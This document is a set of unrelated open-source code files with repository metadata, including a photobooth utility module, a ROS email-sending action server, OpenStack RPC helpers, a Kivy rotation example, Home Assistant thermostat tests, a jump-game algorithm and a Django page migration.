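#       return load_settings_from_disk()
# The body runs once; every later call returns the cached result.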
def open_text_editor(filename):
"""Open a text editor to edit the configuration file.
"""
editors = ['leafpad', 'vi', 'emacs']
for editor in editors:
try:
process = subprocess.Popen([editor, filename])
process.communicate()
return True
except OSError as e:
if e.errno != errno.ENOENT:
# Something else went wrong while trying to run the editor
raise
LOGGER.critical("Can't find installed text editor among %s", editors)
return False
def load_module(path):
"""Load a Python module dynamically.
"""
if not osp.isfile(path):
raise ValueError("Invalid Python module path '{}'".format(path))
dirname, filename = osp.split(path)
modname = osp.splitext(filename)[0]
if dirname not in sys.path:
sys.path.append(dirname)
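# Ask each import hook registered on sys.meta_path for a loader; the first
# hook that recognizes the module name is used to load it.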
for hook in sys.meta_path:
loader = hook.find_module(modname, [dirname])
if loader:
return loader.load_module(modname)
LOGGER.warning("Can not load Python module '%s' from '%s'", modname, path)
|
{
"content_hash": "58c2f0b3d402e7126d0c25eaf29116ed",
"timestamp": "",
"source": "github",
"line_count": 283,
"max_line_length": 104,
"avg_line_length": 29.480565371024735,
"alnum_prop": 0.5975068920052738,
"repo_name": "werdeil/pibooth",
"id": "aeab1c6e2a5fad4d5ec371163056a1ce8be7d508",
"size": "8368",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pibooth/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "198628"
},
{
"name": "Shell",
"bytes": "1980"
}
],
"symlink_target": ""
}
|
import rospy
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import actionlib
import strands_emails.msg
class emailServer(object):
_feedback = strands_emails.msg.SendEmailFeedback()
_result = strands_emails.msg.SendEmailResult()
def __init__(self, name):
self.cancelled = False
self._action_name = name
self.from_add = rospy.get_param("~from_add",'robot@strands.eu')
self.smtp_add = rospy.get_param("~smtp_add",'localhost:25')
rospy.loginfo("Creating action server.")
self._as = actionlib.SimpleActionServer(self._action_name, strands_emails.msg.SendEmailAction, execute_cb = self.executeCallback, auto_start = False)
self._as.register_preempt_callback(self.preemptCallback)
rospy.loginfo(" ...starting")
self._as.start()
rospy.loginfo(" ...done")
rospy.loginfo("Ready to Tweet ...")
rospy.spin()
def _send_email(self, goal):
self.cancelled = False
me = self.from_add
msg = MIMEMultipart('alternative')
msg['Subject'] = goal.subject
msg['From'] = me
msg['To'] = goal.to_address
texts = "%s"%goal.text
part1 = MIMEText(texts, 'plain')
msg.attach(part1)
server = smtplib.SMTP(self.smtp_add)
server.sendmail(me, goal.to_address, msg.as_string())
server.quit()
return True
def executeCallback(self, goal):
self._feedback.senttext = 'Sending...'
self._as.publish_feedback(self._feedback)
rospy.loginfo('%s: sending %s' % (self._action_name, goal.text))
result = self._send_email(goal)
self._result.success = result
self._feedback.senttext = goal.text
self._as.publish_feedback(self._feedback)
self._as.set_succeeded(self._result)
def preemptCallback(self):
self.cancelled = True
self._result.success = False
self._as.set_preempted(self._result)
if __name__ == '__main__':
rospy.init_node('strands_emails')
server = emailServer(rospy.get_name())
|
{
"content_hash": "65a4dd33c9af0342ce10df893e79f539",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 157,
"avg_line_length": 30.323943661971832,
"alnum_prop": 0.6196005573618207,
"repo_name": "cburbridge/strands_apps",
"id": "fa15f1ec09e65bc38232b141331f078f34ab332d",
"size": "2176",
"binary": false,
"copies": "1",
"ref": "refs/heads/hydro-devel",
"path": "strands_emails/scripts/send_emails.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "32677"
},
{
"name": "CMake",
"bytes": "17282"
},
{
"name": "Python",
"bytes": "41465"
},
{
"name": "Shell",
"bytes": "649"
}
],
"symlink_target": ""
}
|
import copy
import sys
import traceback
from oslo.config import cfg
import six
from designate.openstack.common.gettextutils import _
from designate.openstack.common import importutils
from designate.openstack.common import jsonutils
from designate.openstack.common import local
from designate.openstack.common import log as logging
from designate.openstack.common import versionutils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
_RPC_ENVELOPE_VERSION = '2.0'
'''RPC Envelope Version.
This version number applies to the top level structure of messages sent out.
It does *not* apply to the message payload, which must be versioned
independently. For example, when using rpc APIs, a version number is applied
for changes to the API being exposed over rpc. This version number is handled
in the rpc proxy and dispatcher modules.
This version number applies to the message envelope that is used in the
serialization done inside the rpc layer. See serialize_msg() and
deserialize_msg().
The current message format (version 2.0) is very simple. It is::
{
'oslo.version': <RPC Envelope Version as a String>,
'oslo.message': <Application Message Payload, JSON encoded>
}
Message format version '1.0' is just considered to be the messages we sent
without a message envelope.
So, the current message envelope just includes the envelope version. It may
eventually contain additional information, such as a signature for the message
payload.
We will JSON encode the application message payload. The message envelope,
which includes the JSON encoded application message body, will be passed down
to the messaging libraries as a dict.
'''
_VERSION_KEY = 'oslo.version'
_MESSAGE_KEY = 'oslo.message'
_REMOTE_POSTFIX = '_Remote'
class RPCException(Exception):
msg_fmt = _("An unknown RPC related exception occurred.")
def __init__(self, message=None, **kwargs):
self.kwargs = kwargs
if not message:
try:
message = self.msg_fmt % kwargs
except Exception:
# kwargs doesn't match a variable in the message
# log the issue and the kwargs
LOG.exception(_('Exception in string format operation'))
for name, value in six.iteritems(kwargs):
LOG.error("%s: %s" % (name, value))
# at least get the core message out if something happened
message = self.msg_fmt
super(RPCException, self).__init__(message)
class RemoteError(RPCException):
"""Signifies that a remote class has raised an exception.
Contains a string representation of the type of the original exception,
the value of the original exception, and the traceback. These are
sent to the parent as a joined string so printing the exception
contains all of the relevant info.
"""
msg_fmt = _("Remote error: %(exc_type)s %(value)s\n%(traceback)s.")
def __init__(self, exc_type=None, value=None, traceback=None):
self.exc_type = exc_type
self.value = value
self.traceback = traceback
super(RemoteError, self).__init__(exc_type=exc_type,
value=value,
traceback=traceback)
class Timeout(RPCException):
"""Signifies that a timeout has occurred.
This exception is raised if the rpc_response_timeout is reached while
waiting for a response from the remote side.
"""
msg_fmt = _('Timeout while waiting on RPC response - '
'topic: "%(topic)s", RPC method: "%(method)s" '
'info: "%(info)s"')
def __init__(self, info=None, topic=None, method=None):
"""Initiates Timeout object.
:param info: Extra info to convey to the user
:param topic: The topic that the rpc call was sent to
:param method: The name of the rpc method being called
"""
self.info = info
self.topic = topic
self.method = method
super(Timeout, self).__init__(
None,
info=info or _('<unknown>'),
topic=topic or _('<unknown>'),
method=method or _('<unknown>'))
class DuplicateMessageError(RPCException):
msg_fmt = _("Found duplicate message(%(msg_id)s). Skipping it.")
class InvalidRPCConnectionReuse(RPCException):
msg_fmt = _("Invalid reuse of an RPC connection.")
class UnsupportedRpcVersion(RPCException):
msg_fmt = _("Specified RPC version, %(version)s, not supported by "
"this endpoint.")
class UnsupportedRpcEnvelopeVersion(RPCException):
msg_fmt = _("Specified RPC envelope version, %(version)s, "
"not supported by this endpoint.")
class RpcVersionCapError(RPCException):
msg_fmt = _("Specified RPC version cap, %(version_cap)s, is too low")
class Connection(object):
"""A connection, returned by rpc.create_connection().
This class represents a connection to the message bus used for rpc.
An instance of this class should never be created by users of the rpc API.
Use rpc.create_connection() instead.
"""
def close(self):
"""Close the connection.
This method must be called when the connection will no longer be used.
It will ensure that any resources associated with the connection, such
as a network connection, are cleaned up.
"""
raise NotImplementedError()
def create_consumer(self, topic, proxy, fanout=False):
"""Create a consumer on this connection.
A consumer is associated with a message queue on the backend message
bus. The consumer will read messages from the queue, unpack them, and
dispatch them to the proxy object. The contents of the message pulled
off of the queue will determine which method gets called on the proxy
object.
:param topic: This is a name associated with what to consume from.
Multiple instances of a service may consume from the same
topic. For example, all instances of nova-compute consume
from a queue called "compute". In that case, the
messages will get distributed amongst the consumers in a
round-robin fashion if fanout=False. If fanout=True,
every consumer associated with this topic will get a
copy of every message.
:param proxy: The object that will handle all incoming messages.
:param fanout: Whether or not this is a fanout topic. See the
documentation for the topic parameter for some
additional comments on this.
"""
raise NotImplementedError()
def create_worker(self, topic, proxy, pool_name):
"""Create a worker on this connection.
A worker is like a regular consumer of messages directed to a
topic, except that it is part of a set of such consumers (the
"pool") which may run in parallel. Every pool of workers will
receive a given message, but only one worker in the pool will
be asked to process it. Load is distributed across the members
of the pool in round-robin fashion.
:param topic: This is a name associated with what to consume from.
Multiple instances of a service may consume from the same
topic.
:param proxy: The object that will handle all incoming messages.
:param pool_name: String containing the name of the pool of workers
"""
raise NotImplementedError()
def join_consumer_pool(self, callback, pool_name, topic, exchange_name):
"""Register as a member of a group of consumers.
Uses given topic from the specified exchange.
Exactly one member of a given pool will receive each message.
A message will be delivered to multiple pools, if more than
one is created.
:param callback: Callable to be invoked for each message.
:type callback: callable accepting one argument
:param pool_name: The name of the consumer pool.
:type pool_name: str
:param topic: The routing topic for desired messages.
:type topic: str
:param exchange_name: The name of the message exchange where
the client should attach. Defaults to
the configured exchange.
:type exchange_name: str
"""
raise NotImplementedError()
def consume_in_thread(self):
"""Spawn a thread to handle incoming messages.
Spawn a thread that will be responsible for handling all incoming
messages for consumers that were set up on this connection.
Message dispatching inside of this is expected to be implemented in a
non-blocking manner. An example implementation would be having this
thread pull messages in for all of the consumers, but utilize a thread
pool for dispatching the messages to the proxy objects.
"""
raise NotImplementedError()
def _safe_log(log_func, msg, msg_data):
"""Sanitizes the msg_data field before logging."""
SANITIZE = ['_context_auth_token', 'auth_token', 'new_pass']
def _fix_passwords(d):
"""Sanitizes the password fields in the dictionary."""
for k in six.iterkeys(d):
if k.lower().find('password') != -1:
d[k] = '<SANITIZED>'
elif k.lower() in SANITIZE:
d[k] = '<SANITIZED>'
elif isinstance(d[k], list):
for e in d[k]:
if isinstance(e, dict):
_fix_passwords(e)
elif isinstance(d[k], dict):
_fix_passwords(d[k])
return d
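# Example (a sketch): {'method': 'login', 'args': {'user_password': 'x', 'auth_token': 'y'}}
# is logged with both values replaced by '<SANITIZED>'; the deepcopy below keeps
# the original msg_data untouched.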
return log_func(msg, _fix_passwords(copy.deepcopy(msg_data)))
def serialize_remote_exception(failure_info, log_failure=True):
"""Prepares exception data to be sent over rpc.
Failure_info should be a sys.exc_info() tuple.
"""
tb = traceback.format_exception(*failure_info)
failure = failure_info[1]
if log_failure:
LOG.error(_("Returning exception %s to caller"),
six.text_type(failure))
LOG.error(tb)
kwargs = {}
if hasattr(failure, 'kwargs'):
kwargs = failure.kwargs
# NOTE(matiu): With cells, it's possible to re-raise remote, remote
# exceptions. Lets turn it back into the original exception type.
cls_name = str(failure.__class__.__name__)
mod_name = str(failure.__class__.__module__)
if (cls_name.endswith(_REMOTE_POSTFIX) and
mod_name.endswith(_REMOTE_POSTFIX)):
cls_name = cls_name[:-len(_REMOTE_POSTFIX)]
mod_name = mod_name[:-len(_REMOTE_POSTFIX)]
data = {
'class': cls_name,
'module': mod_name,
'message': six.text_type(failure),
'tb': tb,
'args': failure.args,
'kwargs': kwargs
}
json_data = jsonutils.dumps(data)
return json_data
def deserialize_remote_exception(conf, data):
failure = jsonutils.loads(str(data))
trace = failure.get('tb', [])
message = failure.get('message', "") + "\n" + "\n".join(trace)
name = failure.get('class')
module = failure.get('module')
# NOTE(ameade): We DO NOT want to allow just any module to be imported, in
# order to prevent arbitrary code execution.
if module not in conf.allowed_rpc_exception_modules:
return RemoteError(name, failure.get('message'), trace)
try:
mod = importutils.import_module(module)
klass = getattr(mod, name)
if not issubclass(klass, Exception):
raise TypeError("Can only deserialize Exceptions")
failure = klass(*failure.get('args', []), **failure.get('kwargs', {}))
except (AttributeError, TypeError, ImportError):
return RemoteError(name, failure.get('message'), trace)
ex_type = type(failure)
str_override = lambda self: message
new_ex_type = type(ex_type.__name__ + _REMOTE_POSTFIX, (ex_type,),
{'__str__': str_override, '__unicode__': str_override})
new_ex_type.__module__ = '%s%s' % (module, _REMOTE_POSTFIX)
try:
# NOTE(ameade): Dynamically create a new exception type and swap it in
# as the new type for the exception. This only works on user defined
# Exceptions and not core python exceptions. This is important because
# we cannot necessarily change an exception message so we must override
# the __str__ method.
failure.__class__ = new_ex_type
except TypeError:
# NOTE(ameade): If a core exception then just add the traceback to the
# first exception argument.
failure.args = (message,) + failure.args[1:]
return failure
class CommonRpcContext(object):
def __init__(self, **kwargs):
self.values = kwargs
def __getattr__(self, key):
try:
return self.values[key]
except KeyError:
raise AttributeError(key)
def to_dict(self):
return copy.deepcopy(self.values)
@classmethod
def from_dict(cls, values):
return cls(**values)
def deepcopy(self):
return self.from_dict(self.to_dict())
def update_store(self):
local.store.context = self
def elevated(self, read_deleted=None, overwrite=False):
"""Return a version of this context with admin flag set."""
# TODO(russellb) This method is a bit of a nova-ism. It makes
# some assumptions about the data in the request context sent
# across rpc, while the rest of this class does not. We could get
# rid of this if we changed the nova code that uses this to
# convert the RpcContext back to its native RequestContext doing
# something like nova.context.RequestContext.from_dict(ctxt.to_dict())
context = self.deepcopy()
context.values['is_admin'] = True
context.values.setdefault('roles', [])
if 'admin' not in context.values['roles']:
context.values['roles'].append('admin')
if read_deleted is not None:
context.values['read_deleted'] = read_deleted
return context
class ClientException(Exception):
"""Encapsulates actual exception expected to be hit by a RPC proxy object.
Merely instantiating it records the current exception information, which
will be passed back to the RPC client without exceptional logging.
"""
def __init__(self):
self._exc_info = sys.exc_info()
def catch_client_exception(exceptions, func, *args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
if type(e) in exceptions:
raise ClientException()
else:
raise
def client_exceptions(*exceptions):
"""Decorator for manager methods that raise expected exceptions.
Marking a Manager method with this decorator allows the declaration
of expected exceptions that the RPC layer should not consider fatal,
and not log as if they were generated in a real error scenario. Note
that this will cause listed exceptions to be wrapped in a
ClientException, which is used internally by the RPC layer.
"""
def outer(func):
def inner(*args, **kwargs):
return catch_client_exception(exceptions, func, *args, **kwargs)
return inner
return outer
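# Usage sketch on a manager method (RecordNotFound is a hypothetical exception):
#   @client_exceptions(RecordNotFound)
#   def get_record(self, context, record_id):
#       ...
# Listed exceptions are re-raised wrapped in ClientException instead of being
# logged as unexpected errors by the RPC layer.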
# TODO(sirp): we should deprecate this in favor of
# using `versionutils.is_compatible` directly
def version_is_compatible(imp_version, version):
"""Determine whether versions are compatible.
:param imp_version: The version implemented
:param version: The version requested by an incoming message.
"""
return versionutils.is_compatible(version, imp_version)
def serialize_msg(raw_msg):
# NOTE(russellb) See the docstring for _RPC_ENVELOPE_VERSION for more
# information about this format.
msg = {_VERSION_KEY: _RPC_ENVELOPE_VERSION,
_MESSAGE_KEY: jsonutils.dumps(raw_msg)}
return msg
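# Round-trip sketch: serialize_msg({'method': 'ping', 'args': {}}) produces
#   {'oslo.version': '2.0', 'oslo.message': '{"method": "ping", "args": {}}'}
# and deserialize_msg() on that dict returns the original payload.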
def deserialize_msg(msg):
# NOTE(russellb): Hang on to your hats, this road is about to
# get a little bumpy.
#
# Robustness Principle:
# "Be strict in what you send, liberal in what you accept."
#
# At this point we have to do a bit of guessing about what it
# is we just received. Here is the set of possibilities:
#
# 1) We received a dict. This could be 2 things:
#
# a) Inspect it to see if it looks like a standard message envelope.
# If so, great!
#
# b) If it doesn't look like a standard message envelope, it could either
# be a notification, or a message from before we added a message
# envelope (referred to as version 1.0).
# Just return the message as-is.
#
# 2) It's any other non-dict type. Just return it and hope for the best.
# This case covers return values from rpc.call() from before message
# envelopes were used. (messages to call a method were always a dict)
if not isinstance(msg, dict):
# See #2 above.
return msg
base_envelope_keys = (_VERSION_KEY, _MESSAGE_KEY)
if not all(map(lambda key: key in msg, base_envelope_keys)):
# See #1.b above.
return msg
# At this point we think we have the message envelope
# format we were expecting. (#1.a above)
if not version_is_compatible(_RPC_ENVELOPE_VERSION, msg[_VERSION_KEY]):
raise UnsupportedRpcEnvelopeVersion(version=msg[_VERSION_KEY])
raw_msg = jsonutils.loads(msg[_MESSAGE_KEY])
return raw_msg
|
{
"content_hash": "f54fa21c828c9e62c9a7589ae08182a3",
"timestamp": "",
"source": "github",
"line_count": 491,
"max_line_length": 79,
"avg_line_length": 36.30346232179226,
"alnum_prop": 0.6412903225806451,
"repo_name": "NeCTAR-RC/designate",
"id": "8c7ff1f3855dad690fa67466a6874330bc174d3e",
"size": "18588",
"binary": false,
"copies": "1",
"ref": "refs/heads/nectar/icehouse",
"path": "designate/openstack/common/rpc/common.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1402878"
},
{
"name": "Shell",
"bytes": "3809"
}
],
"symlink_target": ""
}
|
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
setup(
name = 'django-localflavor-si',
version = '1.0',
description = 'Country-specific Django helpers for Slovenia.',
long_description = README,
author = 'Django Software Foundation',
author_email = 'foundation@djangoproject.com',
license='BSD',
url = 'https://github.com/django/django-localflavor-si',
packages = ['django_localflavor_si'],
include_package_data = True,
classifiers = [
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
],
install_requires=[
'Django>=1.4',
]
)
|
{
"content_hash": "59c44ef66d492e890b7e6d1c8853703b",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 75,
"avg_line_length": 31.655172413793103,
"alnum_prop": 0.6252723311546841,
"repo_name": "klemensavli/django-localflavor-si",
"id": "b86d9c2d4edb03567b5e189d0486f5e4780f579a",
"size": "918",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "42232"
}
],
"symlink_target": ""
}
|
'''
Rotation Example
================
This example rotates a button using PushMatrix and PopMatrix. You should see
a static button with the words 'hello world' rotated at a 45 degree angle.
'''
from kivy.app import App
from kivy.lang import Builder
kv = '''
FloatLayout:
Button:
text: 'hello world'
size_hint: None, None
pos_hint: {'center_x': .5, 'center_y': .5}
canvas.before:
PushMatrix
Rotate:
angle: 45
origin: self.center
canvas.after:
PopMatrix
'''
class RotationApp(App):
def build(self):
return Builder.load_string(kv)
RotationApp().run()
|
{
"content_hash": "c630d092fbcaa253ed4bd6fde98fc37f",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 76,
"avg_line_length": 19.457142857142856,
"alnum_prop": 0.580029368575624,
"repo_name": "bionoid/kivy",
"id": "68bf0fbba398ded61abfc18e33727dbf48ed2465",
"size": "681",
"binary": false,
"copies": "21",
"ref": "refs/heads/master",
"path": "examples/canvas/rotation.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "321844"
},
{
"name": "C++",
"bytes": "3551"
},
{
"name": "Emacs Lisp",
"bytes": "9671"
},
{
"name": "GLSL",
"bytes": "323"
},
{
"name": "Makefile",
"bytes": "4084"
},
{
"name": "Objective-C",
"bytes": "14779"
},
{
"name": "Python",
"bytes": "4026579"
},
{
"name": "Shell",
"bytes": "356"
},
{
"name": "Vim script",
"bytes": "1731"
}
],
"symlink_target": ""
}
|
"""The tests for the heat control thermostat."""
import unittest
from unittest import mock
from homeassistant.const import (
ATTR_UNIT_OF_MEASUREMENT,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_ON,
STATE_OFF,
TEMP_CELCIUS,
)
from homeassistant.components import thermostat
import homeassistant.components.thermostat.heat_control as heat_control
from tests.common import get_test_home_assistant
ENTITY = 'thermostat.test'
ENT_SENSOR = 'sensor.test'
ENT_SWITCH = 'switch.test'
MIN_TEMP = 3.0
MAX_TEMP = 65.0
TARGET_TEMP = 42.0
class TestSetupThermostatHeatControl(unittest.TestCase):
"""Test the Heat Control thermostat with custom config."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
def tearDown(self): # pylint: disable=invalid-name
"""Stop down everything that was started."""
self.hass.stop()
def test_setup_missing_conf(self):
"""Test set up heat_control with missing config values."""
config = {
'name': 'test',
'target_sensor': ENT_SENSOR
}
add_devices = mock.MagicMock()
result = heat_control.setup_platform(self.hass, config, add_devices)
self.assertEqual(False, result)
def test_setup_with_sensor(self):
"""Test set up heat_control with sensor to trigger update at init."""
self.hass.states.set(ENT_SENSOR, 22.0, {
ATTR_UNIT_OF_MEASUREMENT: TEMP_CELCIUS
})
thermostat.setup(self.hass, {'thermostat': {
'platform': 'heat_control',
'name': 'test',
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR
}})
state = self.hass.states.get(ENTITY)
self.assertEqual(
TEMP_CELCIUS, state.attributes.get('unit_of_measurement'))
self.assertEqual(22.0, state.attributes.get('current_temperature'))
class TestThermostatHeatControl(unittest.TestCase):
"""Test the Heat Control thermostat."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.hass.config.temperature_unit = TEMP_CELCIUS
thermostat.setup(self.hass, {'thermostat': {
'platform': 'heat_control',
'name': 'test',
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR
}})
def tearDown(self): # pylint: disable=invalid-name
"""Stop down everything that was started."""
self.hass.stop()
def test_setup_defaults_to_unknown(self):
"""Test the setting of defaults to unknown."""
self.assertEqual('unknown', self.hass.states.get(ENTITY).state)
def test_default_setup_params(self):
"""Test the setup with default parameters."""
state = self.hass.states.get(ENTITY)
self.assertEqual(7, state.attributes.get('min_temp'))
self.assertEqual(35, state.attributes.get('max_temp'))
self.assertEqual(None, state.attributes.get('temperature'))
def test_custom_setup_params(self):
"""Test the setup with custom parameters."""
thermostat.setup(self.hass, {'thermostat': {
'platform': 'heat_control',
'name': 'test',
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR,
'min_temp': MIN_TEMP,
'max_temp': MAX_TEMP,
'target_temp': TARGET_TEMP
}})
state = self.hass.states.get(ENTITY)
self.assertEqual(MIN_TEMP, state.attributes.get('min_temp'))
self.assertEqual(MAX_TEMP, state.attributes.get('max_temp'))
self.assertEqual(TARGET_TEMP, state.attributes.get('temperature'))
self.assertEqual(str(TARGET_TEMP), self.hass.states.get(ENTITY).state)
def test_set_target_temp(self):
"""Test the setting of the target temperature."""
thermostat.set_temperature(self.hass, 30)
self.hass.pool.block_till_done()
self.assertEqual('30.0', self.hass.states.get(ENTITY).state)
def test_sensor_bad_unit(self):
"""Test sensor that have bad unit."""
self._setup_sensor(22.0, unit='bad_unit')
self.hass.pool.block_till_done()
state = self.hass.states.get(ENTITY)
self.assertEqual(None, state.attributes.get('unit_of_measurement'))
self.assertEqual(None, state.attributes.get('current_temperature'))
def test_sensor_bad_value(self):
"""Test sensor that have None as state."""
self._setup_sensor(None)
self.hass.pool.block_till_done()
state = self.hass.states.get(ENTITY)
self.assertEqual(None, state.attributes.get('unit_of_measurement'))
self.assertEqual(None, state.attributes.get('current_temperature'))
def test_set_target_temp_heater_on(self):
"""Test if target temperature turn heater on."""
self._setup_switch(False)
self._setup_sensor(25)
self.hass.pool.block_till_done()
thermostat.set_temperature(self.hass, 30)
self.hass.pool.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_ON, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_set_target_temp_heater_off(self):
"""Test if target temperature turn heater off."""
self._setup_switch(True)
self._setup_sensor(30)
self.hass.pool.block_till_done()
thermostat.set_temperature(self.hass, 25)
self.hass.pool.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_OFF, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_set_temp_change_heater_on(self):
"""Test if temperature change turn heater on."""
self._setup_switch(False)
thermostat.set_temperature(self.hass, 30)
self.hass.pool.block_till_done()
self._setup_sensor(25)
self.hass.pool.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_ON, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_temp_change_heater_off(self):
"""Test if temperature change turn heater off."""
self._setup_switch(True)
thermostat.set_temperature(self.hass, 25)
self.hass.pool.block_till_done()
self._setup_sensor(30)
self.hass.pool.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_OFF, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def _setup_sensor(self, temp, unit=TEMP_CELCIUS):
"""Setup the test sensor."""
self.hass.states.set(ENT_SENSOR, temp, {
ATTR_UNIT_OF_MEASUREMENT: unit
})
def _setup_switch(self, is_on):
"""Setup the test switch."""
self.hass.states.set(ENT_SWITCH, STATE_ON if is_on else STATE_OFF)
self.calls = []
def log_call(call):
"""Log service calls."""
self.calls.append(call)
self.hass.services.register('switch', SERVICE_TURN_ON, log_call)
self.hass.services.register('switch', SERVICE_TURN_OFF, log_call)
|
{
"content_hash": "b2e0d7805588ac725bb53c784b9166f6",
"timestamp": "",
"source": "github",
"line_count": 201,
"max_line_length": 78,
"avg_line_length": 38.09950248756219,
"alnum_prop": 0.626926090363019,
"repo_name": "luxus/home-assistant",
"id": "cb75c72f8ca9fea8746bf87f55e4cdfd5541dd09",
"size": "7658",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "tests/components/thermostat/test_heat_control.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "814604"
},
{
"name": "Python",
"bytes": "938037"
},
{
"name": "Shell",
"bytes": "3681"
}
],
"symlink_target": ""
}
|
import importlib.machinery
SUFFIXES = [
('Source:', importlib.machinery.SOURCE_SUFFIXES),
('Debug:',
importlib.machinery.DEBUG_BYTECODE_SUFFIXES),
('Optimized:',
importlib.machinery.OPTIMIZED_BYTECODE_SUFFIXES),
('Bytecode:', importlib.machinery.BYTECODE_SUFFIXES),
('Extension:', importlib.machinery.EXTENSION_SUFFIXES),
]
def main():
tmpl = '{:<10} {}'
for name, value in SUFFIXES:
print(tmpl.format(name, value))
if __name__ == '__main__':
main()
|
{
"content_hash": "03999685adf554e8672172be90aed517",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 59,
"avg_line_length": 25.2,
"alnum_prop": 0.6448412698412699,
"repo_name": "gaufung/PythonStandardLibrary",
"id": "1104619caa5ff0d6a634e495bbd055e076e9d2b0",
"size": "504",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ModuleAndPackage/importlib/importlib_suffixes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "3175176"
},
{
"name": "Python",
"bytes": "70796"
}
],
"symlink_target": ""
}
|
"""
Given an array of non-negative integers, you are initially positioned at the
first index of the array.
Each element in the array represents your maximum jump length at that
position.
Your goal is to reach the last index in the minimum number of jumps.
For example:
Given array A = [2,3,1,1,4]
The minimum number of jumps to reach the last index is 2. (Jump 1 step from
index 0 to 1, then 3 steps to the last index.)
"""
class Solution(object):
def jump(self, nums):
"""
:type nums: List[int]
:rtype: int
Time Limit Exceeded
"""
n = len(nums)
        # t[i] means minimum number of jumps needed to reach nums[i]
t = [-1 for i in range(n)]
t[0] = 0
        if n == 1:
            return 0  # already at the last index; zero jumps needed
for i in range(n):
steps = nums[i]
end = min(i + steps, n - 1)
for j in range(i + 1, end + 1):
if t[j] == -1:
t[j] = t[i] + 1
else:
t[j] = min(t[i] + 1, t[j])
return t[-1]
a1 = [2, 3, 1, 1, 4]
s = Solution()
print(s.jump(a1))
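# A linear-time greedy alternative, added here as a sketch (the class and
# variable names below are illustrative, not part of the original solution):
# keep the right edge of the window reachable with the current number of jumps
# and take another jump whenever that window is exhausted.
class SolutionGreedy(object):
    def jump(self, nums):
        jumps = 0
        current_end = 0  # farthest index reachable with `jumps` jumps
        farthest = 0     # farthest index reachable with one more jump
        for i in range(len(nums) - 1):
            farthest = max(farthest, i + nums[i])
            if i == current_end:
                jumps += 1
                current_end = farthest
        return jumps

print(SolutionGreedy().jump(a1))  # expected: 2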
|
{
"content_hash": "793e48bca46ff527c3a51306111ee42b",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 76,
"avg_line_length": 25.09090909090909,
"alnum_prop": 0.5226449275362319,
"repo_name": "shichao-an/leetcode-python",
"id": "391b909efc6d8f3996ad7ada419b9de11567195d",
"size": "1104",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "jump_game_ii/solution3.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "228552"
},
{
"name": "Shell",
"bytes": "353"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations
from django import VERSION as DJANGO_VERSION
def populate_static_pages(apps, schema_editor):
RawHTMLPage = apps.get_model('cms_pages.RawHTMLPage')
ContentType = apps.get_model('contenttypes.ContentType')
HomePage = apps.get_model('cms_pages.HomePage')
HomePageTopMenuLink = apps.get_model('cms_pages.HomePageTopMenuLink')
raw_html_page_content_type, _ = ContentType.objects.get_or_create(
model='rawhtmlpage',
app_label='cms_pages',
defaults={'name': 'rawhtmlpage'} if DJANGO_VERSION < (1, 8) else {}
)
home_page = HomePage.objects.all()[0]
# Create about page
about_page = RawHTMLPage.objects.create(
title="Декларації: Про проект",
slug='about',
content_type=raw_html_page_content_type,
path='000100010001',
depth=3,
numchild=0,
body="""
<p>Вас вітає проект Канцелярської сотні — «Гарнахата».</p>
""",
url_path='/home/about/',
)
# Create API page
api_page = RawHTMLPage.objects.create(
title="ГарнаХата: Відкритий API",
slug='api',
content_type=raw_html_page_content_type,
path='000100010002',
depth=3,
numchild=0,
body="""
<p>Тут колись буде про наше API</p>
""",
url_path='/home/api/',
)
HomePageTopMenuLink.objects.create(
caption="Головна",
link_external="/",
sort_order=0,
